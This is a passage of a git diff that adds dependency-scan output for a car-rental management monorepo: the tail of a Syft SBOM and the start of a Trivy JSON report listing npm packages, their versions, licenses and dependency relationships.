rch/.github/workflows/lint.yml"},"metadata":{"mode":644,"type":"RegularFile","userID":1000,"groupID":1000,"mimeType":"text/plain","size":471},"digests":[{"algorithm":"sha1","value":"954cdc06cee4b5c6235cf29df588ad9937f40341"},{"algorithm":"sha256","value":"3dbdd9b8482cf250da0d4160e61f968918bf119a5808e553270733fc11fcfc21"}]},{"id":"566c1173d29a42e6","location":{"path":"/node_modules/turbo-darwin-arm64/bin/turbo"},"executable":{"format":"macho","hasExports":false,"hasEntrypoint":true,"importedLibraries":["/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation","/System/Library/Frameworks/CoreServices.framework/Versions/A/CoreServices","/System/Library/Frameworks/IOKit.framework/Versions/A/IOKit","/System/Library/Frameworks/Security.framework/Versions/A/Security","/usr/lib/libSystem.B.dylib","/usr/lib/libiconv.2.dylib","/usr/lib/libz.1.dylib"]},"unknowns":["unknowns-labeler: no package identified in executable file"]},{"id":"fd71c2238fc07657","location":{"path":"/package-lock.json"},"metadata":{"mode":644,"type":"RegularFile","userID":1000,"groupID":1000,"mimeType":"application/json","size":387899},"digests":[{"algorithm":"sha1","value":"9acf27ed34da7dbaafde9a4f0c8022376beb9014"},{"algorithm":"sha256","value":"850adf9d34c06f12df9a3fcb895780dbb7147e8ef8fc77e08e7c339d0323eec7"}]},{"id":"21b8f63dfc41fcdb","location":{"path":"/packages/database/generated/libquery_engine-darwin-arm64.dylib.node"},"executable":{"format":"macho","hasExports":true,"hasEntrypoint":false,"importedLibraries":["/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation","/System/Library/Frameworks/Security.framework/Versions/A/Security","/System/Library/Frameworks/SystemConfiguration.framework/Versions/A/SystemConfiguration","/usr/lib/libSystem.B.dylib","/usr/lib/libiconv.2.dylib","/usr/lib/libz.1.dylib"]},"unknowns":["unknowns-labeler: no package identified in executable file"]},{"id":"6a377238bf0f6d05","location":{"path":"/packages/database/generated/libquery_engine-linux-arm64-openssl-3.0.x.so.node"},"executable":{"format":"elf","hasExports":true,"hasEntrypoint":true,"importedLibraries":["libssl.so.3","libcrypto.so.3","libgcc_s.so.1","libpthread.so.0","libm.so.6","libdl.so.2","libc.so.6","ld-linux-aarch64.so.1"],"elfSecurityFeatures":{"symbolTableStripped":true,"stackCanary":true,"nx":true,"relRO":"full","pie":false,"dso":true,"safeStack":false}},"unknowns":["unknowns-labeler: no package identified in executable file"]}],"source":{"id":"a96462bd35ec313c66d7bfadee750937cbdfcf1d92b30330d246fad3d0ed2a62","name":"/scan","version":"","type":"directory","metadata":{"path":"/scan"}},"distro":{},"descriptor":{"name":"syft","version":"1.42.4","configuration":{"catalogers":{"requested":{"default":["directory","file"]},"used":["alpm-db-cataloger","apk-db-cataloger","binary-classifier-cataloger","cargo-auditable-binary-cataloger","cocoapods-cataloger","conan-cataloger","conda-meta-cataloger","dart-pubspec-cataloger","dart-pubspec-lock-cataloger","deb-archive-cataloger","dotnet-deps-binary-cataloger","dotnet-packages-lock-cataloger","dpkg-db-cataloger","elf-binary-package-cataloger","elixir-mix-lock-cataloger","erlang-otp-application-cataloger","erlang-rebar-lock-cataloger","file-content-cataloger","file-digest-cataloger","file-executable-cataloger","file-metadata-cataloger","gguf-cataloger","github-action-workflow-usage-cataloger","github-actions-usage-cataloger","go-module-binary-cataloger","go-module-file-cataloger","graalvm-native-image-cataloger","haskell-cataloger","homebrew-cataloger","java-archive-cataloger","java-gradle-lockfile-cataloger","java-jvm-cataloger","java-pom-cataloger","javascript-lock-cataloger","linux-kernel-cataloger","lua-rock-cataloger","nix-cataloger","opam-cataloger","pe-binary-package-cataloger","php-composer-lock-cataloger","php-interpreter-cataloger","php-pear-serialized-cataloger","portage-cataloger","python-installed-package-cataloger","python-package-cataloger","r-package-cataloger","rpm-archive-cataloger","rpm-db-cataloger","ruby-gemfile-cataloger","ruby-gemspec-cataloger","rust-cargo-lock-cataloger","snap-cataloger","swift-package-manager-cataloger","swipl-pack-cataloger","terraform-lock-cataloger","wordpress-plugins-cataloger"]},"data-generation":{"generate-cpes":true},"files":{"content":{"globs":null,"skip-files-above-size":0},"hashers":["sha-1","sha-256"],"selection":"owned-by-package"},"licenses":{"coverage":75,"include-content":"none"},"packages":{"binary":["python-binary","python-binary-lib","pypy-binary-lib","go-binary","julia-binary","helm","redis-binary","valkey-binary","nodejs-binary","busybox-binary","util-linux-binary","haproxy-binary","perl-binary","php-composer-binary","httpd-binary","memcached-binary","traefik-binary","arangodb-binary","postgresql-binary","mysql-binary","mysql-binary","mysql-binary","xtrabackup-binary","mariadb-binary","rust-standard-library-linux","rust-standard-library-macos","ruby-binary","erlang-binary","erlang-alpine-binary","erlang-library","swipl-binary","dart-binary","haskell-ghc-binary","haskell-cabal-binary","haskell-stack-binary","consul-binary","hashicorp-vault-binary","nginx-binary","bash-binary","openssl-binary","qt-qtbase-lib","gcc-binary","fluent-bit-binary","wordpress-cli-binary","curl-binary","lighttpd-binary","proftpd-binary","zstd-binary","xz-binary","gzip-binary","sqlcipher-binary","jq-binary","chrome-binary","ffmpeg-binary","ffmpeg-library","ffmpeg-library","elixir-binary","elixir-library","istio-binary","istio-binary","grafana-binary","grafana-binary","envoy-binary","mongodb-binary","java-binary","java-jdb-binary"],"dotnet":{"dep-packages-must-claim-dll":true,"dep-packages-must-have-dll":false,"exclude-project-references":true,"propagate-dll-claims-to-parents":true,"relax-dll-claims-when-bundling-detected":true},"golang":{"local-mod-cache-dir":"/home/jmo/go/pkg/mod","local-vendor-dir":"","main-module-version":{"from-build-settings":true,"from-contents":false,"from-ld-flags":true},"proxies":["https://proxy.golang.org","direct"],"search-local-mod-cache-licenses":false,"search-local-vendor-licenses":false,"search-remote-licenses":false,"use-packages-lib":true},"java-archive":{"include-indexed-archives":true,"include-unindexed-archives":false,"maven-base-url":"https://repo1.maven.org/maven2","maven-localrepository-dir":"/home/jmo/.m2/repository","max-parent-recursive-depth":0,"resolve-transitive-dependencies":false,"use-maven-localrepository":false,"use-network":false},"javascript":{"include-dev-dependencies":false,"npm-base-url":"https://registry.npmjs.org","search-remote-licenses":false},"linux-kernel":{"catalog-modules":true},"nix":{"capture-owned-files":false},"python":{"guess-unpinned-requirements":false,"pypi-base-url":"https://pypi.org/pypi","search-remote-licenses":false}},"relationships":{"exclude-binary-packages-with-file-ownership-overlap":true,"package-file-ownership":true,"package-file-ownership-overlap":true},"search":{"scope":"squashed"}}},"schema":{"version":"16.1.3","url":"https://raw.githubusercontent.com/anchore/syft/main/schema/json/schema-16.1.3.json"}} diff --git a/results/individual-repos/scan/trivy.json b/results/individual-repos/scan/trivy.json new file mode 100644 index 0000000..149222a --- /dev/null +++ b/results/individual-repos/scan/trivy.json @@ -0,0 +1,16434 @@ +{ + "SchemaVersion": 2, + "Trivy": { + "Version": "0.70.0" + }, + "ReportID": "019e493e-bb55-7aea-a306-c36f2373dbd8", + "CreatedAt": "2026-05-21T06:35:08.501720513Z", + "ArtifactID": "sha256:7d573aa59656fc97bcbc67a77e29bcea2ff62dbc23b95e895c6fe045a270a422", + "ArtifactName": "/scan", + "ArtifactType": "repository", + "Metadata": { + "RepoURL": "https://gitlab.rentaldrivego.ma/rental_car/car_management_system.git", + "Branch": "develop", + "Commit": "e74681e810a0eec89557d76afe565a6afefd5df0", + "CommitMsg": "fix the upload issue and add driver license upload", + "Author": "root \u003cmelabidi@alrahmaisgl.org\u003e", + "Committer": "root \u003cmelabidi@alrahmaisgl.org\u003e" + }, + "Results": [ + { + "Target": "package-lock.json", + "Class": "lang-pkgs", + "Type": "npm", + "Packages": [ + { + "ID": "@rentaldrivego/admin@1.0.0", + "Name": "@rentaldrivego/admin", + "Identifier": { + "PURL": "pkg:npm/%40rentaldrivego/admin@1.0.0", + "UID": "d35298d4b64ba129" + }, + "Version": "1.0.0", + "Relationship": "direct", + "DependsOn": [ + "@rentaldrivego/types@1.0.0", + "autoprefixer@10.5.0", + "dayjs@1.11.20", + "lucide-react@0.376.0", + "next@14.2.3", + "postcss@8.5.12", + "react-dom@18.3.1", + "react@18.3.1", + "recharts@2.15.4", + "tailwindcss@3.4.19", + "zod@3.25.76" + ], + "Locations": [ + { + "StartLine": 26, + "EndLine": 48 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@rentaldrivego/api@1.0.0", + "Name": "@rentaldrivego/api", + "Identifier": { + "PURL": "pkg:npm/%40rentaldrivego/api@1.0.0", + "UID": "800b4d4dcd94b343" + }, + "Version": "1.0.0", + "Relationship": "direct", + "DependsOn": [ + "@react-pdf/renderer@3.4.5", + "@rentaldrivego/database@1.0.0", + "@rentaldrivego/types@1.0.0", + "bcryptjs@2.4.3", + "cors@2.8.6", + "dayjs@1.11.20", + "express-rate-limit@8.5.1", + "express@4.22.1", + "firebase-admin@12.7.0", + "helmet@7.2.0", + "ioredis@5.10.1", + "jsonwebtoken@9.0.3", + "morgan@1.10.1", + "multer@1.4.5-lts.2", + "node-cron@3.0.3", + "nodemailer@6.10.1", + "otplib@12.0.1", + "qrcode@1.5.4", + "react-dom@18.3.1", + "react@18.3.1", + "resend@3.5.0", + "socket.io@4.8.3", + "twilio@5.13.1", + "zod@3.25.76" + ], + "Locations": [ + { + "StartLine": 49, + "EndLine": 97 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@rentaldrivego/dashboard@1.0.0", + "Name": "@rentaldrivego/dashboard", + "Identifier": { + "PURL": "pkg:npm/%40rentaldrivego/dashboard@1.0.0", + "UID": "185bb7d27d9f96b2" + }, + "Version": "1.0.0", + "Relationship": "direct", + "DependsOn": [ + "@rentaldrivego/types@1.0.0", + "autoprefixer@10.5.0", + "dayjs@1.11.20", + "lucide-react@0.376.0", + "next@14.2.3", + "postcss@8.5.12", + "react-dom@18.3.1", + "react@18.3.1", + "recharts@2.15.4", + "sharp@0.34.5", + "socket.io-client@4.8.3", + "tailwindcss@3.4.19", + "zod@3.25.76" + ], + "Locations": [ + { + "StartLine": 98, + "EndLine": 122 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@rentaldrivego/database@1.0.0", + "Name": "@rentaldrivego/database", + "Identifier": { + "PURL": "pkg:npm/%40rentaldrivego/database@1.0.0", + "UID": "2eb55b2a36401afc" + }, + "Version": "1.0.0", + "Relationship": "direct", + "DependsOn": [ + "@prisma/client@5.22.0" + ], + "Locations": [ + { + "StartLine": 10691, + "EndLine": 10705 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@rentaldrivego/marketplace@1.0.0", + "Name": "@rentaldrivego/marketplace", + "Identifier": { + "PURL": "pkg:npm/%40rentaldrivego/marketplace@1.0.0", + "UID": "29959651b2b1df22" + }, + "Version": "1.0.0", + "Relationship": "direct", + "DependsOn": [ + "@rentaldrivego/types@1.0.0", + "autoprefixer@10.5.0", + "dayjs@1.11.20", + "lucide-react@0.376.0", + "next@14.2.3", + "postcss@8.5.12", + "react-dom@18.3.1", + "react@18.3.1", + "tailwindcss@3.4.19", + "zod@3.25.76" + ], + "Locations": [ + { + "StartLine": 123, + "EndLine": 144 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@rentaldrivego/types@1.0.0", + "Name": "@rentaldrivego/types", + "Identifier": { + "PURL": "pkg:npm/%40rentaldrivego/types@1.0.0", + "UID": "9cfb68955b685b20" + }, + "Version": "1.0.0", + "Relationship": "direct", + "Locations": [ + { + "StartLine": 10706, + "EndLine": 10712 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/node@20.19.39", + "Name": "@types/node", + "Identifier": { + "PURL": "pkg:npm/%40types/node@20.19.39", + "UID": "e52466e0f5d6ae34" + }, + "Version": "20.19.39", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "undici-types@6.21.0" + ], + "Locations": [ + { + "StartLine": 2991, + "EndLine": 2999 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@alloc/quick-lru@5.2.0", + "Name": "@alloc/quick-lru", + "Identifier": { + "PURL": "pkg:npm/%40alloc/quick-lru@5.2.0", + "UID": "eabc09a8e2d7cc74" + }, + "Version": "5.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 168, + "EndLine": 179 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/runtime@7.29.2", + "Name": "@babel/runtime", + "Identifier": { + "PURL": "pkg:npm/%40babel/runtime@7.29.2", + "UID": "efdc60895ed7e484" + }, + "Version": "7.29.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 180, + "EndLine": 188 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@emnapi/runtime@1.10.0", + "Name": "@emnapi/runtime", + "Identifier": { + "PURL": "pkg:npm/%40emnapi/runtime@1.10.0", + "UID": "887f8b1c4a506fdd" + }, + "Version": "1.10.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "tslib@2.4.1" + ], + "Locations": [ + { + "StartLine": 213, + "EndLine": 222 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@fastify/busboy@3.2.0", + "Name": "@fastify/busboy", + "Identifier": { + "PURL": "pkg:npm/%40fastify/busboy@3.2.0", + "UID": "b086cb7586830ce9" + }, + "Version": "3.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 677, + "EndLine": 682 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/app-check-interop-types@0.3.2", + "Name": "@firebase/app-check-interop-types", + "Identifier": { + "PURL": "pkg:npm/%40firebase/app-check-interop-types@0.3.2", + "UID": "5c211ec741afd152" + }, + "Version": "0.3.2", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 683, + "EndLine": 688 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/app-types@0.9.2", + "Name": "@firebase/app-types", + "Identifier": { + "PURL": "pkg:npm/%40firebase/app-types@0.9.2", + "UID": "7c4c0d2da42707f7" + }, + "Version": "0.9.2", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 689, + "EndLine": 694 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/auth-interop-types@0.2.3", + "Name": "@firebase/auth-interop-types", + "Identifier": { + "PURL": "pkg:npm/%40firebase/auth-interop-types@0.2.3", + "UID": "9ef3fcde3df03910" + }, + "Version": "0.2.3", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 695, + "EndLine": 700 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/component@0.6.9", + "Name": "@firebase/component", + "Identifier": { + "PURL": "pkg:npm/%40firebase/component@0.6.9", + "UID": "efe79664f9c97535" + }, + "Version": "0.6.9", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/util@1.10.0", + "tslib@2.4.1" + ], + "Locations": [ + { + "StartLine": 701, + "EndLine": 710 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/database@1.0.8", + "Name": "@firebase/database", + "Identifier": { + "PURL": "pkg:npm/%40firebase/database@1.0.8", + "UID": "971444f40948bb4b" + }, + "Version": "1.0.8", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app-check-interop-types@0.3.2", + "@firebase/auth-interop-types@0.2.3", + "@firebase/component@0.6.9", + "@firebase/logger@0.4.2", + "@firebase/util@1.10.0", + "faye-websocket@0.11.4", + "tslib@2.4.1" + ], + "Locations": [ + { + "StartLine": 711, + "EndLine": 725 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/database-compat@1.0.8", + "Name": "@firebase/database-compat", + "Identifier": { + "PURL": "pkg:npm/%40firebase/database-compat@1.0.8", + "UID": "746ad7a0bc86a1ea" + }, + "Version": "1.0.8", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/component@0.6.9", + "@firebase/database-types@1.0.5", + "@firebase/database@1.0.8", + "@firebase/logger@0.4.2", + "@firebase/util@1.10.0", + "tslib@2.4.1" + ], + "Locations": [ + { + "StartLine": 726, + "EndLine": 739 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/database-types@1.0.5", + "Name": "@firebase/database-types", + "Identifier": { + "PURL": "pkg:npm/%40firebase/database-types@1.0.5", + "UID": "e6ebc274d6ea6673" + }, + "Version": "1.0.5", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app-types@0.9.2", + "@firebase/util@1.10.0" + ], + "Locations": [ + { + "StartLine": 740, + "EndLine": 749 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/logger@0.4.2", + "Name": "@firebase/logger", + "Identifier": { + "PURL": "pkg:npm/%40firebase/logger@0.4.2", + "UID": "c0fb267079ddd272" + }, + "Version": "0.4.2", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "tslib@2.4.1" + ], + "Locations": [ + { + "StartLine": 750, + "EndLine": 758 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@firebase/util@1.10.0", + "Name": "@firebase/util", + "Identifier": { + "PURL": "pkg:npm/%40firebase/util@1.10.0", + "UID": "9fa386d605e9d2d3" + }, + "Version": "1.10.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "tslib@2.4.1" + ], + "Locations": [ + { + "StartLine": 759, + "EndLine": 767 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@google-cloud/firestore@7.11.6", + "Name": "@google-cloud/firestore", + "Identifier": { + "PURL": "pkg:npm/%40google-cloud/firestore@7.11.6", + "UID": "55559b9964eb1328" + }, + "Version": "7.11.6", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@opentelemetry/api@1.9.1", + "fast-deep-equal@3.1.3", + "functional-red-black-tree@1.0.1", + "google-gax@4.6.1", + "protobufjs@7.5.6" + ], + "Locations": [ + { + "StartLine": 768, + "EndLine": 784 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@google-cloud/paginator@5.0.2", + "Name": "@google-cloud/paginator", + "Identifier": { + "PURL": "pkg:npm/%40google-cloud/paginator@5.0.2", + "UID": "25b399e30c6d265e" + }, + "Version": "5.0.2", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "arrify@2.0.1", + "extend@3.0.2" + ], + "Locations": [ + { + "StartLine": 785, + "EndLine": 798 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@google-cloud/projectify@4.0.0", + "Name": "@google-cloud/projectify", + "Identifier": { + "PURL": "pkg:npm/%40google-cloud/projectify@4.0.0", + "UID": "7a4577274004ad22" + }, + "Version": "4.0.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 799, + "EndLine": 808 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@google-cloud/promisify@4.0.0", + "Name": "@google-cloud/promisify", + "Identifier": { + "PURL": "pkg:npm/%40google-cloud/promisify@4.0.0", + "UID": "403868c2bf98af32" + }, + "Version": "4.0.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 809, + "EndLine": 818 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@google-cloud/storage@7.19.0", + "Name": "@google-cloud/storage", + "Identifier": { + "PURL": "pkg:npm/%40google-cloud/storage@7.19.0", + "UID": "d38daf4c32ee8b21" + }, + "Version": "7.19.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@google-cloud/paginator@5.0.2", + "@google-cloud/projectify@4.0.0", + "@google-cloud/promisify@4.0.0", + "abort-controller@3.0.0", + "async-retry@1.3.3", + "duplexify@4.1.3", + "fast-xml-parser@5.7.2", + "gaxios@6.7.1", + "google-auth-library@9.15.1", + "html-entities@2.6.0", + "mime@3.0.0", + "p-limit@3.1.0", + "retry-request@7.0.2", + "teeny-request@9.0.0", + "uuid@8.3.2" + ], + "Locations": [ + { + "StartLine": 819, + "EndLine": 845 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@grpc/grpc-js@1.14.3", + "Name": "@grpc/grpc-js", + "Identifier": { + "PURL": "pkg:npm/%40grpc/grpc-js@1.14.3", + "UID": "70c358a80b4c403b" + }, + "Version": "1.14.3", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@grpc/proto-loader@0.8.0", + "@js-sdsl/ordered-map@4.4.2" + ], + "Locations": [ + { + "StartLine": 857, + "EndLine": 870 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@grpc/proto-loader@0.7.15", + "Name": "@grpc/proto-loader", + "Identifier": { + "PURL": "pkg:npm/%40grpc/proto-loader@0.7.15", + "UID": "59377ee7fd481b41" + }, + "Version": "0.7.15", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "lodash.camelcase@4.3.0", + "long@5.3.2", + "protobufjs@7.5.6", + "yargs@17.7.2" + ], + "Locations": [ + { + "StartLine": 890, + "EndLine": 908 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@grpc/proto-loader@0.8.0", + "Name": "@grpc/proto-loader", + "Identifier": { + "PURL": "pkg:npm/%40grpc/proto-loader@0.8.0", + "UID": "4cbcda42bf72ec9d" + }, + "Version": "0.8.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "lodash.camelcase@4.3.0", + "long@5.3.2", + "protobufjs@7.5.6", + "yargs@17.7.2" + ], + "Locations": [ + { + "StartLine": 871, + "EndLine": 889 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@img/colour@1.1.0", + "Name": "@img/colour", + "Identifier": { + "PURL": "pkg:npm/%40img/colour@1.1.0", + "UID": "9d0c7d76d679b63d" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 947, + "EndLine": 955 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@img/sharp-darwin-arm64@0.34.5", + "Name": "@img/sharp-darwin-arm64", + "Identifier": { + "PURL": "pkg:npm/%40img/sharp-darwin-arm64@0.34.5", + "UID": "15ef5e9f162f322" + }, + "Version": "0.34.5", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@img/sharp-libvips-darwin-arm64@1.2.4" + ], + "Locations": [ + { + "StartLine": 956, + "EndLine": 977 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@img/sharp-darwin-x64@0.34.5", + "Name": "@img/sharp-darwin-x64", + "Identifier": { + "PURL": "pkg:npm/%40img/sharp-darwin-x64@0.34.5", + "UID": "2ec77cf73c13551d" + }, + "Version": "0.34.5", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@img/sharp-libvips-darwin-x64@1.2.4" + ], + "Locations": [ + { + "StartLine": 978, + "EndLine": 999 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@img/sharp-libvips-darwin-arm64@1.2.4", + "Name": "@img/sharp-libvips-darwin-arm64", + "Identifier": { + "PURL": "pkg:npm/%40img/sharp-libvips-darwin-arm64@1.2.4", + "UID": "fb62065f95b673a9" + }, + "Version": "1.2.4", + "Licenses": [ + "LGPL-3.0-or-later" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1000, + "EndLine": 1015 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@img/sharp-libvips-darwin-x64@1.2.4", + "Name": "@img/sharp-libvips-darwin-x64", + "Identifier": { + "PURL": "pkg:npm/%40img/sharp-libvips-darwin-x64@1.2.4", + "UID": "e40f68495375eaaf" + }, + "Version": "1.2.4", + "Licenses": [ + "LGPL-3.0-or-later" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1016, + "EndLine": 1031 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@img/sharp-libvips-linux-arm@1.2.4", + "Name": "@img/sharp-libvips-linux-arm", + "Identifier": { + "PURL": "pkg:npm/%40img/sharp-libvips-linux-arm@1.2.4", + "UID": "e27c6b80e397d663" + }, + "Version": "1.2.4", + "Licenses": [ + "LGPL-3.0-or-later" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1032, + "EndLine": 1047 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@img/sharp-libvips-linux-arm64@1.2.4", + "Name": "@img/sharp-libvips-linux-arm64", + "Identifier": { + "PURL": "pkg:npm/%40img/sharp-libvips-linux-arm64@1.2.4", + "UID": "45b2773dcb5ab1a4" + }, + "Version": "1.2.4", + "Licenses": [ + "LGPL-3.0-or-later" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1048, + "EndLine": 1063 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@img/sharp-libvips-linux-ppc64@1.2.4", + "Name": "@img/sharp-libvips-linux-ppc64", + "Identifier": { + "PURL": "pkg:npm/%40img/sharp-libvips-linux-ppc64@1.2.4", + "UID": "548a5c39a3135e47" + }, + "Version": "1.2.4", + "Licenses": [ + "LGPL-3.0-or-later" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1064, + "EndLine": 1079 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@img/sharp-libvips-linux-riscv64@1.2.4", + "Name": "@img/sharp-libvips-linux-riscv64", + "Identifier": { + "PURL": "pkg:npm/%40img/sharp-libvips-linux-riscv64@1.2.4", + "UID": "9606965de0037f3" + }, + "Version": "1.2.4", + "Licenses": [ + "LGPL-3.0-or-later" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1080, + "EndLine": 1095 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@img/sharp-libvips-linux-s390x@1.2.4", + "Name": "@img/sharp-libvips-linux-s390x", + "Identifier": { + "PURL": "pkg:npm/%40img/sharp-libvips-linux-s390x@1.2.4", + "UID": "8352c8fc4e5177c0" + }, + "Version": "1.2.4", + "Licenses": [ + "LGPL-3.0-or-later" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1096, + "EndLine": 1111 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@img/sharp-libvips-linux-x64@1.2.4", + "Name": "@img/sharp-libvips-linux-x64", + "Identifier": { + "PURL": "pkg:npm/%40img/sharp-libvips-linux-x64@1.2.4", + "UID": "a4c9c40a861aaffd" + }, + "Version": "1.2.4", + "Licenses": [ + "LGPL-3.0-or-later" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1112, + "EndLine": 1127 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@img/sharp-libvips-linuxmusl-arm64@1.2.4", + "Name": "@img/sharp-libvips-linuxmusl-arm64", + "Identifier": { + "PURL": "pkg:npm/%40img/sharp-libvips-linuxmusl-arm64@1.2.4", + "UID": "17970487abb86e87" + }, + "Version": "1.2.4", + "Licenses": [ + "LGPL-3.0-or-later" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1128, + "EndLine": 1143 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@img/sharp-libvips-linuxmusl-x64@1.2.4", + "Name": "@img/sharp-libvips-linuxmusl-x64", + "Identifier": { + "PURL": "pkg:npm/%40img/sharp-libvips-linuxmusl-x64@1.2.4", + "UID": "c54318b56fe1db3a" + }, + "Version": "1.2.4", + "Licenses": [ + "LGPL-3.0-or-later" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1144, + "EndLine": 1159 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@img/sharp-linux-arm@0.34.5", + "Name": "@img/sharp-linux-arm", + "Identifier": { + "PURL": "pkg:npm/%40img/sharp-linux-arm@0.34.5", + "UID": "75c52b2d9a150fd" + }, + "Version": "0.34.5", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@img/sharp-libvips-linux-arm@1.2.4" + ], + "Locations": [ + { + "StartLine": 1160, + "EndLine": 1181 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@img/sharp-linux-arm64@0.34.5", + "Name": "@img/sharp-linux-arm64", + "Identifier": { + "PURL": "pkg:npm/%40img/sharp-linux-arm64@0.34.5", + "UID": "13a77720bf2aeaaf" + }, + "Version": "0.34.5", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@img/sharp-libvips-linux-arm64@1.2.4" + ], + "Locations": [ + { + "StartLine": 1182, + "EndLine": 1203 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@img/sharp-linux-ppc64@0.34.5", + "Name": "@img/sharp-linux-ppc64", + "Identifier": { + "PURL": 